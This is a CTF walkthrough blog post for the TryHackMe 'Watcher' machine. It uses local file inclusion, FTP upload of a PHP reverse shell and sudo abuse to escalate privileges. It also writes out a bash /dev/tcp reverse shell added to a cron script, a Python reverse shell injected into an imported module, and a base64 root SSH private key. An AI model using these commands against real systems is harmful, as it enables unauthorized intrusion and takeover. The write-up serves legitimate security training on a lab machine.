---
title: "Writeup - Watcher (THM)"
date: 2022-04-02
slug: "writeup-watcher-thm"
type: "writeup-ctf"
--- 

This is a writeup for the [Watcher](https://tryhackme.com/room/watcher) machine from the TryHackMe site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV -T4 -Pn 10.10.91.35
```
Three TCP ports are discovered:

![](img/image-1.webp)

- 21/tcp : FTP (vsftpd 3.0.3)
- 22/tcp : SSH port (OpenSSH 7.6p1)
- 80/tcp : HTTP web server (Apache 2.4.29)

## Flag 1 - robots.txt

At first I start by listing the pages of the website.

![](img/image-2.webp)

The `robots.txt` page catches my attention, so I go to it and find the following content:


```bash
User-agent: *
Allow: /flag_1.txt
Allow: /secret_file_do_not_read.txt
```
So we learn the existence of 2 pages, the first is accessible and gives us the first flag :


```bash
┌──(d3vyce㉿kali)-[~]
└─$ curl http://10.10.91.35/flag_1.txt
FLAG{robots_dot_text_what_is_next}
```
The second one is unfortunately not available at the moment.

## Flag 2 - ftpuser

After some research, I find that the page `post.php` has a `post` argument that allows to change the article. By trying a simple injection I can access the contents of a file that I know exists on the remote machine:


```bash
http://10.10.91.35/post.php?post=/etc/passwd
```
![](img/image-3.webp)

I will be able to see the content of the page previously found:


```bash
┌──(d3vyce㉿kali)-[~]
└─$ curl http://10.10.91.35/post.php?post=secret_file_do_not_read.txt
[...]
  Hi Mat,

The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files.

Will

----------

ftpuser:givemefiles777
[...]
```
We learn that the credentials of the FTP server are: `ftpuser:givemefiles777`. So I can connect and list the files:

![](img/image-4.webp)

I find the file of the second one, I download it and I display it:


```bash
┌──(d3vyce㉿kali)-[~]
└─$ cat flag_2.txt               
FLAG{ftp_you_and_me}
```
## Flag 3 - www-data

In addition to the reading rights, the FTP access allows me to send files. So I create a PHP reverse shell, then I upload it on the server.

![](img/image-5.webp)

I launch the script by accessing the following URL:


```bash
10.10.91.35/post.php?post=/home/ftpuser/ftp/files/reverse.php
```
![](img/image-6.webp)

I now have a reverse shell, I look for the third flag with the following command:


```bash
$ find / -name flag_3.txt 2>/dev/null
/var/www/html/more_secrets_a9f10a/flag_3.txt
$ cat /var/www/html/more_secrets_a9f10a/flag_3.txt
FLAG{lfi_what_a_guy}
```
## Flag 4 - toby

Using the same command as above I find that the fourth flag is in the user `toby` folder. So I will have to find a way to change the user.

![](img/image-7.webp)

Looking at the sudo permissions I have with my current user, I find that I can run any command as `toby`. 


```bash
$ sudo -l
Matching Defaults entries for www-data on watcher:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on watcher:
    (toby) NOPASSWD: ALL
```
So I create a shell with the following command:


```bash
sudo -u toby /bin/sh
```
I can now recover the fourth flag.


```bash
toby@watcher:/home$ cat toby/flag_4.txt
cat toby/flag_4.txt
FLAG{chad_lifestyle}
```
## Flag 5 - mat

After searching for the fifth flag I find that it is in the personal file of `mat`. 

But I also find 2 files in the personal folder of my current user:


```bash
$ cat toby/note.txt
Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

Mat
$ cat toby/jobs/cow.sh
#!/bin/bash
cp /home/mat/cow.jpg /tmp/cow.jpg
```
I then discover that the `cow.sh` script is executed every minute by the `mat` user. 


```bash
toby@watcher:/home$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
[...]
*/1 * * * * mat /home/toby/jobs/cow.sh
```
Knowing that I can modify the content of this script, I add a reverse shell to the file with the following command:


```bash
echo "/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> toby/jobs/cow.sh
```
I now have a reverse shell as a `mat`:

![](img/image-8.webp)

And I can get the fifth flag back:


```bash
mat@watcher:~$ cat flag_5.txt   
cat flag_5.txt
FLAG{live_by_the_cow_die_by_the_cow}
```
## Flag 6 - will

After searching for the sixth flag I find that it is in `will` personnel file.

But I also find 1 file in the personal folder of my current user:


```bash
mat@watcher:~$ cat note.txt
cat note.txt
Hi Mat,

I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.

Will
```
Looking at my sudo permissions, I discover that I can run the `will_scirpt.py` script as `will`.

![](img/image-9.webp)

By looking at the functioning of the script I discover that it is in two parts:


```bash
mat@watcher:~$ cat scripts/will_script.py
cat scripts/will_script.py
import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])

whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
        print("Invalid command!")
        exit()

os.system(cmd)

------------------------------------------

mat@watcher:~$ cat scripts/cmd.py
cat scripts/cmd.py
def get_command(num):
        if(num == "1"):
                return "ls -lah"
        if(num == "2"):
                return "id"
        if(num == "3"):
                return "cat /etc/passwd"
```
And interestingly the second part of the script is editable by my user:


```bash
mat@watcher:~$ ls -la scripts
ls -la scripts
total 16
drwxrwxr-x 2 will will 4096 Dec  3  2020 .
drwxr-xr-x 6 mat  mat  4096 Dec  3  2020 ..
-rw-r--r-- 1 mat  mat   133 Dec  3  2020 cmd.py
-rw-r--r-- 1 will will  208 Dec  3  2020 will_script.py
```
So I add a python reverse shell at the beginning of the file.


```bash
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.3.186",3456));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

def get_command(num):
        if(num == "1"):
                return "ls -lah"
        if(num == "2"):
                return "id"
        if(num == "3"):
                return "cat /etc/passwd"' > scripts/cmd.py
```
Then I run the script with the following command:


```bash
sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1
```
I now have a reverse shell as a `will`.

![](img/image-10.webp)

And I can get the sixth flag back.


```bash
will@watcher:/home/will$ cat flag_6.txt
cat flag_6.txt
FLAG{but_i_thought_my_script_was_secure}
```
## Flag 7 - root

When I try to find the seventh flag with the same method as for the previous ones, I can't find anything... It must be the root flag!

I first use [linPeas](https://linpeas.sh) to try to find a way to do an elevation of privilege. After a few minutes of analysis of the result of the command. I find a strange file belonging to the root user but readable by my user :

![](img/image-11.webp)

I retrieve its contents and then decrypt it with the `base64` command.


```bash
will@watcher:/home/will$ cat /opt/backups/key.b64
cat /opt/backups/key.b64
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx
OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh
WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45
ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu
TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ
T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw
bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR
QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3
YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H
VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR
cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5
cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3
c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS
QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO
dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI
UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2
TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB
QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ
TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj
dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz
K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu
U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw
NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2
TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD
WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0
bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4
NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG
bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4
STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=
```
This is an `id_rsa`! Certainly the one of the root user. So I add the permissions to the file, then I launch an SSH session:

![](img/image-12.webp)

I now have a `root` reserse shell and I can recover the last flag.


```bash
root@watcher:~# cat flag_7.txt 
FLAG{who_watches_the_watchers}
```